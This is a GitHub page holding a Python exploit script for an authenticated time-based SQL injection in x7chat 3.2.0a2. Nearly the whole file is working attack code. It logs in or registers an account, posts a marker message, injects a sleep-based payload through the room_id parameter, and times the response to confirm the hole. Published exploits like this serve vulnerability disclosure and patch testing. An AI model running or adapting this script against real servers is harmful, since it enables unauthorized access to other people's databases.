-
Notifications
You must be signed in to change notification settings - Fork 3
/
x7chat.py
139 lines (124 loc) · 4.13 KB
/
x7chat.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
# Exploit Title: x7chat 3.2.0a2 authenticated SQL injection
# Date: 2nd of July, 2018
# Exploit Author: Mustafa Hasan (@strukt93)
import requests
import time
host = 'http://192.168.1.10/x7chat-3.2.0a2/index.php'
message_base = 'x7exploit_' # Leave unchanged
"""
The following username/password combination is used to
authenticate to the x7chat instance and send a special
message string to the room identified by room_id below.
If you wish to let the script register a new user before
exploitation, flip the register_new variable to True.
Otherwise, replace the credentials with your own.
"""
username = 'x7exploit'
password = 'x7exploit'
email = '[email protected]' # Only used if register_new is set to True.
register_new = False # Set to true if you'd like the script to register a new user.
room_no = 1 # The room number to post the special message to.
sleep_time = 3 # The time for the sleep() call on the MySQL instance to consume.
payload = "1))) or (((message.message = '{}' and sleep({}))#" # The SQL injection payload, change as desired.
def login():
params = {
'page': 'dologin'
}
data = {
'username': username,
'password': password,
'login_button': 'Login'
}
response = requests.post(host, params=params, data=data, allow_redirects=False)
status_code = response.status_code
if status_code == 302:
print "[+] Authenticated successfully"
return response.cookies
print "[+] Authentication failed"
return False
def register():
params = {
'page': 'doregister'
}
data = {
'username': username,
'password': password,
'repassword': password,
'email': email,
'register_button': 'Create Account'
}
response = requests.post(host, params=params,data=data, allow_redirects=False)
status_code = response.status_code
if status_code == 302:
location = response.headers['Location']
if location == '?page=chat':
print "[+] User registered successfully"
return response.cookies
else:
print "[-] Username already registered, try with the register_new flag set to False"
return False
print "[-] User couldn't be registered"
return False
def send_message(cookies):
timestamp = str(time.time())
params = {
'page': 'send'
}
data = {
'dest_type': 'room',
'room': room_no,
'message': message_base + timestamp
}
response = requests.post(host, params=params, data=data, cookies=cookies)
status_code = response.status_code
if status_code == 200:
print "[+] Special message posted to chat room #{}".format(room_no)
return timestamp
print "[-] Special message couldn't be posted ro chat room #{}".format(room_no)
return False
def join_room(cookies, timestamp):
params = {
'page': 'joinroom',
'room_id': payload.format(message_base + timestamp, sleep_time)
}
response = requests.get(host, params=params, cookies=cookies)
status_code = response.status_code
if status_code == 200:
print "[+] SQL injection payload sent"
return True
print "[-] SQL injection payload couldn't be sent"
return False
def sync(cookies):
params = {
'page': 'sync'
}
print "[*] Checking if the payload will execute correctly..."
response = requests.get(host, params=params, cookies=cookies)
status_code = response.status_code
if status_code == 200:
exec_time = response.elapsed.total_seconds()
return exec_time
print "[-] An error occurred while checking"
return False
def quit():
print "[-] Exploit failed"
exit()
def run():
if register_new:
cookies = register()
else:
cookies = login()
if not cookies:
quit()
timestamp = send_message(cookies)
if not timestamp:
quit()
if not join_room(cookies, timestamp):
quit()
exec_time = sync(cookies)
if not exec_time:
quit()
if sleep_time + 1 > exec_time > sleep_time:
# Assuming the server responds in less than 1 second
print "[+] Exploit succeeded (Y)"
run()